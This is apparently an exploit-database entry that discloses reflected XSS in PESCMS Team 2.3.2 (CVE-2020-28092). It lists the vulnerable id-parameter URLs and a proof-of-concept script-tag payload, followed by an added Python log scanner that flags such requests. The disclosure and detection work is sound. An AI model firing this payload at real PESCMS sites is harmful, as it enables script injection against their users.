
12 changes to exploits/shellcodes

Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
Joomla! Component com_memorix - SQL Injection
Joomla! Component com_informations - SQL Injection
Joomla! Component com_memorix - SQL Injection
Joomla! Component com_informations - SQL Injection
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
xuucms 3 - 'keywords' SQL Injection
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
TestBox CFML Test Framework 4.1.0 - Directory Traversal
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
M/Monit 3.7.4 - Privilege Escalation
M/Monit 3.7.4 - Password Disclosure
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
17 lines
No EOL
591 B
Text
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:
?g=Team&m=Task&a=my&status=3&id=
?g=Team&m=Task&a=my&status=0&id=
?g=Team&m=Task&a=my&status=1&id=
?g=Team&m=Task&a=my&status=10&id=

please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

now I input payload:

"><ScRiPt>alert(1)</ScRiPt>
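
Added example (not part of the original advisory or of PESCMS): a log check for requests to the route listed above whose decoded id value contains HTML metacharacters. The combined access-log format, the sample lines, and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Route named in the advisory: ?g=Team&m=Task&a=my&status=<n>&id=<value>
AFFECTED_ROUTE = {"g": "team", "m": "task", "a": "my"}
# Characters that let a value close an HTML attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses come from documentation ranges and
# the third line uses a made-up route to show that other views are ignored.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Nov/2020:10:00:01 +0000] '
    '"GET /?g=Team&m=Task&a=my&status=3&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Nov/2020:10:00:05 +0000] '
    '"GET /?g=Team&m=Task&a=my&status=0&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 5170',
    '192.0.2.10 - - [18/Nov/2020:10:00:09 +0000] '
    '"GET /?g=Team&m=Project&a=index&id=%3Cb%3E HTTP/1.1" 200 900',
]

def suspicious_id(url):
    """Return the decoded id value when the URL targets the affected route
    and id contains HTML metacharacters; otherwise return None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key, expected in AFFECTED_ROUTE.items():
        # Case-insensitive match on routing values is a conservative choice.
        if query.get(key, [""])[0].lower() != expected:
            return None
    for value in query.get("id", []):
        if HTML_META.search(value):
            return value
    return None

def scan(log_lines):
    """Return (client_address, decoded_id) for every flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        value = suspicious_id(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} sent id={value!r} to the Task 'my' view")
```

The check decodes the query string once, so it sees the value as the application receives it from a browser that percent-encodes quotes and angle brackets.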